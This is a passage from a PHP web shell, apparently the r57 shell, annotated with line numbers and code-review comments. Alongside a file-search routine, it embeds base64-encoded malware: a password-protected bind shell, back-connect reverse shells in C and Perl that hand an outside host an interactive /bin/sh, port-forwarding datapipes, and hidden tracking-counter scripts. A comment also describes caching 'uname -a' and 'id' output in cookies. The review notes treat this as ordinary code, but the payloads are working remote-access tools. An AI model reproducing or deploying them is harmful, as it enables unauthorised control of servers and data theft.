 * @return array List of "<dir>/<file>" paths.
 */
1273 function DirFilesR($dir,$types='')
1274 {
1275 $files = Array();
1276 if(($handle = @opendir($dir)))
1277 {
1278 while (false !== ($file = @readdir($handle)))
1279 {
1280 if ($file != "." && $file != "..")
1281 {
// Descend into subdirectories; is_dir() follows symlinks and there is no depth limit
// or loop guard here.
1282 if(@is_dir($dir."/".$file))
1283 $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
1284 else
1285 {
// Extension = everything from the last '.'; for a name without a dot strrpos()
// returns false.
1286 $pos = @strrpos($file,".");
1287 $ext = @substr($file,$pos,@strlen($file)-$pos);
1288 if($types)
1289 {
1290 if(@in_array($ext,explode(';',$types)))
1291 $files[] = $dir."/".$file;
1292 }
1293 else
1294 $files[] = $dir."/".$file;
1295 }
1296 }
1297 }
1298 @closedir($handle);
1299 }
1300 return $files;
1301 }
/**
 * Text search over a set of files: collects the files below one or more directories and
 * records every line matching the search text.
 *
 * Written in PHP 4 style (`var` properties, constructor named after the class). PHP 8
 * no longer treats such a method as the constructor.
 */
1302 class SearchResult
1303 {
// Search text as given by the caller.
1304 var $text;
// Paths collected by the constructor.
1305 var $FilesToSearch;
// file name => (line number => highlighted line).
1306 var $ResultFiles;
1307 var $FilesTotal;
1308 var $MatchesCount;
// NOTE(review): declared as FileMatschesCount, but every use below is FileMatchesCount,
// so this declared property is never read or written.
1309 var $FileMatschesCount;
1310 var $TimeStart;
1311 var $TimeTotal;
// Initialised to an empty array and never filled in this class.
1312 var $titles;
// Constructor: $dir is a ';'-separated list of directories, $filter the optional
// extension list passed on to DirFilesR().
1313 function SearchResult($dir,$text,$filter='')
1314 {
1315 $dirs = @explode(";",$dir);
1316 $this->FilesToSearch = Array();
1317 for($a=0;$a<count($dirs);$a++)
1318 $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
1319 $this->text = $text;
1320 $this->FilesTotal = @count($this->FilesToSearch);
1321 $this->TimeStart = getmicrotime();
1322 $this->MatchesCount = 0;
1323 $this->ResultFiles = Array();
1324 $this->FileMatchesCount = Array();
1325 $this->titles = Array();
1326 }
1327 function GetFilesTotal() { return $this->FilesTotal; }
1328 function GetTitles() { return $this->titles; }
1329 function GetTimeTotal() { return $this->TimeTotal; }
1330 function GetMatchesCount() { return $this->MatchesCount; }
1331 function GetFileMatchesCount() { return $this->FileMatchesCount; }
1332 function GetResultFiles() { return $this->ResultFiles; }
// Runs the search. $phrase wraps each word in \b word boundaries; a falsy $case makes
// the match case-insensitive.
1333 function SearchText($phrase=0,$case=0) {
// The text is split on spaces and the words are OR-ed into one alternation. No
// preg_quote() is applied, so the search text is interpreted as a regular expression.
1334 $qq = @explode(' ',$this->text);
1335 $delim = '|';
1336 if($phrase)
1337 foreach($qq as $k=>$v)
1338 $qq[$k] = '\b'.$v.'\b';
1339 $words = '('.@implode($delim,$qq).')';
1340 $pattern = "/".$words."/";
1341 if(!$case)
1342 $pattern .= 'i';
1343 foreach($this->FilesToSearch as $k=>$filename)
1344 {
1345 $this->FileMatchesCount[$filename] = 0;
// NOTE(review): `@next` is a bare identifier, not `continue`; an unreadable file appears
// to fall through to the loop below with $FileStrings === false. Confirm.
1346 $FileStrings = @file($filename) or @next;
1347 for($a=0;$a<@count($FileStrings);$a++)
1348 {
1349 $count = 0;
1350 $CurString = $FileStrings[$a];
1351 $CurString = @Trim($CurString);
// Tags are stripped before matching, so the stored line is the tag-free text.
1352 $CurString = @strip_tags($CurString);
1353 $aa = '';
1354 if(($count = @preg_match_all($pattern,$CurString,$aa)))
1355 {
// Wrap each match in a highlight span; results are keyed by 1-based line number.
1356 $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
1357 $this->ResultFiles[$filename][$a+1] = $CurString;
1358 $this->MatchesCount += $count;
1359 $this->FileMatchesCount[$filename] += $count;
1360 }
1361 }
1362 }
1363 $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
1364 }
1365 }
/**
 * Returns the current Unix time in seconds as a float, including the sub-second part.
 */
function getmicrotime()
{
    // microtime() without arguments yields "<fraction> <seconds>".
    $pieces = @explode(" ", @microtime());
    $fraction = (float)$pieces[0];
    $seconds = (float)$pieces[1];

    return ($fraction + $seconds);
}
1371$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
1372A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
1373GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
1374b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
1375pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
1376NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
1377ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
1378ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
13797DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
13809tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
13812ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
1382dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
1383lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
1384$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
1385VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
1386JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
1387TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
1388lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
1389Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
1390Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
1391lIENPTk47DQpleGl0IDA7DQp9DQp9";
1392$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
1393aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
1394hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
1395sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
1396kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
1397KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
1398OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1399$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
1400BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
1401SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
1402KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
1403sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
1404Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
1405QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
1406Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1407$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
1408x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
1409HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
1410aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
1411lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
1412xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
1413W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
1414LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
1415udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
14160KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
1417iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
1418KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
1419gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
1420hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
1421iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
1422ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
1423vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
1424AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
1425QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
1426ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
1427gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
1428wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
142929jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
1430MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
1431gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
14325zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
1433HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
1434dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
1435KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
1436ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
1437E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
1438Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
1439NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
1440J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
1441CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
1442dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
1443gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
1444lsZSk7DQogIHJldHVybiAwOw0KfQ==";
1445$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
1446CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
1447bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
1448gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
1449NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
1450iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
1451aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
1452SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
1453xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
1454WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
1455CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
1456yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
1457I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
1458m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
1459IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
1460lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
1461QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
1462CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
1463c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
1464NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
1465UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
1466DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
1467ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
14681ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
1469$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
1470JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
1471lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
1472FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
14733NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
1474J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
1475oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
1476xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
1477i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
1478dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
1479ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
1480hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
1481$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
1482IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
1483hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
1484tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
1485XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
14868eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
1487ybmV0LS0+";
// On Unix hosts, collect `uname -a`, `id` and the kernel type/release once via ex() and
// cache them in cookies named uname, id and sysctl; later requests reuse the cookie
// values instead of running the commands again.
// Review note: the cached values come back from the client, and the header code further
